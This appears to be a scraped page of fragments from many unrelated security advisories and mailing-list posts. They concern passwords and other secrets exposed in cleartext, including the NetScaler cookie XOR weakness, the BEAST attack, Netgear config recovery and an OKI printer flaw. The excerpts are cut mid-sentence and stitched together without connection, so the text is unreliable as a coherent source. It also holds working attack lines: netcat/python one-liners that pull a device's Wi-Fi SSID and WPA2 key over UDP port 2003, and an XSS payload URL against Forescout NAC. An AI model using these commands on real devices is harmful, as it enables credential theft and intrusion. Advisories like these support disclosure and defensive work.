Next Page >>
plain text
certificate, so that there can be no "man in the middle" (servers
usually don't verify client certificates).
The problem discussed in this writeup is caused by a software flaw.
The flaw allows an attacker to inject client commands into an SMTP
session during the unprotected plaintext SMTP protocol phase (more
on that below), such that the server will execute those commands
during the SMTP-over-TLS protocol phase when all communication is
supposed to be protected.
The injected commands could be used to steal the victim's email or
Background:
For most web application logins a user fills out an HTTP form, which sets up the user with a session cookie. The cookie content is merely a session ID, which allows the server-side application to match incoming requests to a specific user and session. If the cookie gets compromised, such as using XSS, the attacker might be able to impersonate the user for the duration of the session but it typically does not allow the attacker to obtain the user's login credentials.
Vulnerability:
The web management interface of Citrix NetScaler stores the user's credentials in an encrypted form in the cookie, namely values ns1 and ns2. In addition the cookie contains other encrypted information in values ns3, ns4, and ns5. Since the encryption is a simple XOR with a fixed key stream it is possible to determine parts of the key stream by XOR'ing a known plaintext with its corresponding ciphertext. This in turn allows the attacker to recover the plaintext form of the user's credentials by applying the key stream to cookie values ns1 and ns2. Furthermore, the cipher does not in any way pad the plaintext before it gets encrypted so the length of the ciphertext is equal to the length of the plaintext, which also provides a clue about the plaintext.
There are several approaches to obtain the ciphertext for some known plaintext:
* Log into the management console with the attacker's own credentials (if the attacker is a configured user, even with minimal privileges) and analyze his own cookie.
* Make an educated guess about the username contained in ns1. (As an example, the default root user on NetScaler is "nsroot".)
========================================================================
Vulnerability Affecting FireGPG Passphrase and Cleartext Recovery
10/20/2008
Abstract
FireGPG is a Firefox extension that provides a front-end to GPG,
allowing webmail users to conveniently exchange GPG messages from
Firefox.
/------------------------------------------------------\
| Group-Office Cleartext Credentials Stored in Cookies |
\------------------------------------------------------/
Summary
=======
Group-Office 4.0.71 was found to display a behaviour that could potentially
expose a user's username and cleartext password to third-parties. Under
2.2) Unauthenticated file disclosure & file write/modification
An unauthenticated attacker is able to read arbitrary files of the operating
system with the access rights of the operating system user "nagios" (the only
"security protection" is the weak Referer-check from 2.1). He is able to gain
sensitive information such as cleartext passwords of monitored systems.
Furthermore, it is possible to alter those files if they are owned and writable
by the "nagios" user, which nearly all "GroundWork" files under
"/usr/local/groundwork" are.
4. Inadequate Encryption Strength
###############################################################################
Reason: Weak encryption algorithm used in OpenCart
Preconditions: none
Result: attacker can use Known Plaintext Attack and obtain encryption key
http://opencarthelp.com/a/?q=improve-opencart-security#change_encryption_key
"Change your encryption key (PCI)
Changing the encryption key will help increase security for your store
Details:
This release includes fixes for the following vulnerabilities:
1.BEAST (Browser Exploit Against SSL/TLS) attack (CVE-2011-3389
>There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.
The BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
2.Buffer overflow vulnerability (CVE-2012-2110/CVE-2012-2131)
SSL-C contains code that does not properly interpret integer data, which could allow buffer overflow attacks using crafted DER (Distinguished Encoding Rules) data, such as in X.509 certificate or an RSA asymmetric key.
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- -----------------------------------------------------------------------
iViZ Techno Solutions Pvt. Ltd.
http://www.ivizsecurity.com
- -----------------------------------------------------------------------
* Title: Hewlett-Packard BIOS Plain Text Password Disclosure
* Date: 25/08/2008
* Software: Hewlett-Packard BIOS
* Vendor Bug Tracker : SSRT080104
> Based on the description contained in the CPNI report and a slightly
> more detailed description forwarded by CERT this issue appears to be
> substantially similar to a known weakness in the SSH binary packet
> protocol first described in 2002 by Bellare, Kohno and Namprempre[2].
> The new component seems to be an attack that can recover 14 bits of
> plaintext with a success probability of 2^-14
Could someone please help the uncomprehending [i.e. me :-)] understand
why or whether this is anything to be worried about at all ?
Quick calculator session :
- Session fixation
- Session impersonation
- Remote buffer overflow
- Privilege escalation in two applications
- Missing authentication in configuration panel
- Admin password is delivered in plaintext inside the server response
- Cookies are set for root path, not application path
- Crawler endless loop
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
OpenSSH Security Advisory: cbc.adv
Regarding the "Plaintext Recovery Attack Against SSH" reported as
CPNI-957037[1]:
The OpenSSH team has been made aware of an attack against the SSH
protocol version 2 by researchers at the University of London.
Unfortunately, due to the report lacking any detailed technical
description of the attack and CPNI's unwillingness to share necessary
information, we are unable to properly assess its impact.
----------------------------
evalsmsi 2.1.03 contains multiple vulnerabilities.
1 - Insecure storage of password
The passwords are stored in plaintext in the database.
table : authentification
column: password
2 - Authentication Bypass
> connection.
>
>> > The usage pattern where the attack is most likely to succeed is where an
>> > automated connection is configured to retry indefinitely in the event of
>> > errors. In this case, it might be possible to recover as much as 14 bits
>> > of plaintext per hour
[...]
>> Given the amount of data pumped down the typical automated connection
>> per hour, this is hardly anything to worry about .. surely ?
>
> That depends on the data that is being transferred. If it includes
The (h)h3cUserPassword is presented in one of three formats as defined
in the (h)h3cAuthMode object and mirrors how passwords are stored in the
device configuration:
0 -- password simple, meaning cleartext
7 -- password cipher, meaning ciphertext
9 -- password sha-256, meaning one-way sha-256 hash
SHA-256 is a recent addition and is not supported on all devices yet.
Furthermore with every "authentication" attempt to the server the attacker
gains knowledge of the administrative password.
The password for the "SuperUser" is sent from the TSA server to the client
in
cleartext in the following way:
Name=SuperUser Password=072 175 173 176 173 177 181
Well, it is exacrly as it appears above. It is the "SuperUser"'s account
name and
23/tcp open telnet
80/tcp open http
Port 80 gives access through an HTML interface to the configuration menu as would be expected, but although you can control access to that interface using a password, there is no control over the telnet port. So, telnetting to port 23 (on is default IP 192.168.0.1) the users get automatically access to the filesystem, by providing no credentials at all. Now the file system of the device may be used for malicious communication and temporary data storage. Too, a user may download the upgrade firware's HTML code from the www directory and modify it locally so allow other files than IMGs to be uploaded and replace the existing firmware, making the device useless.
Also, one can view the contents of /etc/htpasswd file, where everything is in plaintext, and retrieve the web-based administrator's (admin) password. Some of the possible implications, that can be triggered from the web-interface, but not limited to the following, are:
1. Intruders are now capable to open the configuration page and go through the submenus where they can get the wireless key in use (the wireless key is being displayed in plaintext, as well)
2. They can perform a trivial DoS attack (factory restart the modem and everything stops working) similarly from the telnet session, by issuing the command "reboot" the device will obey and it will restart itself
3. They can change configurations and policies for clients causing confusion
4. Or they could download a backup copy of the configuration file for the device (the same file can be obtained by viewing the contents of "/tmp/nvram"); by viewing that file one can easily extract the ADSL account logins or any other information is curious about, as everything is stored in plaintext - once again)
Details:
There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.
The BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.
CVE-2011-0435
Insufficient checks in bw_per_month.php can lead to bandwidth
usage information disclosure.
CVE-2011-0436
After a registration, passwords are sent in cleartext
email messages.
CVE-2011-0437
Authenticated users could delete accounts using an obsolete
interface which was incorrectly included in the package.
Introduction:
-------------
The OKI C5510MFP printer offers a web interface for the configuration.
Certain pages require higher privileges for making changes. However, the
password required for accessing these pages is sent to the client in
clear text by the printer. Furthermore, the password can be set without
prior authentication. Consequently, the whole configuration can be
changed without knowing the password.
Vulnerable:
I quickly discovered two interesting things:
First, I found a hard-coded credential used for direct serial programming. Using it requires direct physical access and you have to solder wires onto the board. Despite this not being particularly interesting, this issue has been assigned as CVE-2012-6340 anyway. It's always good to have the information out there.
Second, I noticed that there were multiple copies of my config file, and all passwords (for both control panel and wifi) within them are plain-text. It turns out that, in order to prevent config file corruption, the router re-generates the entire config file and writes a new copy directly after the previous one. It then activates the new config, and soft-deletes the old file by removing its entry from a list. Once you've changed the config several times (about 11 on this device), it hits the end of the flash chip's storage and cycles back to the original address. However, it does not actually wipe the old config files.
This issue, assigned CVE-2012-6341, results in the ability to recover all previously used passwords on the device, for both the control panel and WEP/WPA/WPA2, in plaintext. A factory reset does not fix this; it simply restores a default config file onto the lower address. As such, an attacker who steals the device may recover the last-used passwords and config, as well as many previous passwords and configuration data. There also seems to be some storage of DHCP client information, but the data I have is inconclusive due to it being partially overwritten.
This has been confirmed on the WGR614v7 and WGR614v9 models, and is expected to be the case on all other revisions. It also looks like the WGR624 model has the same design, so other models in the same series may be affected too.
1. The IE user's browsing history is compounded of different files
and folders. One of these files is named 'index.dat', and is usually
located at: 'C:\Documents and settings\USERNAME\Local
settings\History\History.IE5\index.dat'. Although the format of this
file is not entirely text, IE will store every visited URL including any
parameters in the query string in plain text.
2. Although the aforementioned folder cannot be directly browsed
using Windows Explorer or Internet Explorer, it can be browsed and
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
Formshield1. The value of the properties parameter changed each time
new text was populated in the CAPTCHA image. Changing content of this
parameter results in no new text being generated at all. The encrypted
properties value though is obtained by a dynamic key in the
__VIEWSTATE variable. If the contents of the __VIEWSTATE variable can
be obtained then we have a plaintext cipher text match which can be
replayed every time for every new request.
Details of the Attack
To carry out this attack we need to intercept and modify HTTP(S)
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
uncommon to store sensitive data in them.
Exploiting this vulnerability requires modification of the
serialized view object, which is not stored in a plaintext
format. The Deface tool[12] can be used to provide
proof-of-concept attacks.
Remediation Steps:
SEC Consult Security Advisory < 20090429-0 >
=======================================================================
title: Proxy bypass vulnerability & plain text passwords
in LevelOne AMG-2000
product: LevelOne AMG-2000 Wireless AP Management Gateway
vulnerable version: Firmware <=2.00.00build00600
impact: critical
homepage: http://www.level1.com
found: 2008-12-16
by: J. Greil / SEC Consult / www.sec-consult.com
Microsoft Office Outlook is a personal information manager. It is often
mainly used as an e-mail application, but it also includes a calendar,
task manager, contact manager, note taking, a journal and web browsing.
Outlook supports various e-mail formats, including plain text, HTML and
TNEF. TNEF is a proprietary format used by Microsoft Outlook and
Microsoft Exchange Server. TNEF messages or TNEF streams exist of
message and/or attachment attributes. These attributes contain basic
properties, such as message subject, date sent and attachment title
(file name). Additional attributes can be set using MAPI properties,
* Chris Thomas reported that background tabs could create a
borderless XUL pop-up in front of pages in other tabs
(CVE-2008-1241).
* oo.rio.oo discovered that a plain text file with a
"Content-Disposition: attachment" prevents Firefox from rendering
future plain text files within the browser (CVE-2008-0592).
* Martin Straka reported that the ".href" property of stylesheet DOM
nodes is modified to the final URI of a 302 redirect, bypassing the
http://(NACIP)/assets/rangesearch?fromIndex=0&query=asdf" onclick="alert(123)"&main_selection=all
Forescout NAC ICMP and ARP Protocols Not Filtered Vulnerability Advisory (CVE-2012-4985)
Forescout NAC (Network Access Control) device is vulnerable to ICMP and ARP protocol filter bypass. The NAC does not filter traffic from unknown clients over these protocols. An attacker with an unauthorised device can engage ARP poisoning attacks and potentially gain access to cleartext login credentials traversing the network (where cleartext protocols are employed). The attacker could then use these credentials via an authorised terminal/workstation to gain full access to the network.
http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html
http://www.reactionpenetrationtesting.co.uk/forescout-nac-xss.html
http://www.reactionpenetrationtesting.co.uk/forescout-nac-icmp-arp.html
NetSaro Enterprise Messenger Server Plaintext Password Storage Vulnerability
CVSS Risk Rating: 4.6 (Medium)
Product: NetSaro Enterprise Messenger Server
Application Vendor: SEM Software
Vendor URL: http://www.netsaro.com/
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
- Retrieving Wi-Fi SSID
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt
-u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
received datagram)
- Retrieving WPA2 PSK
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' |
nc -u -o pass.txt <IP_ADDR> 2003
Intro
----
Roundcube Webmail is a browser-based IMAP client that uses
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text, this library uses the preg_replace PHP
function in an insecure manner.
Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Next Page>>
|
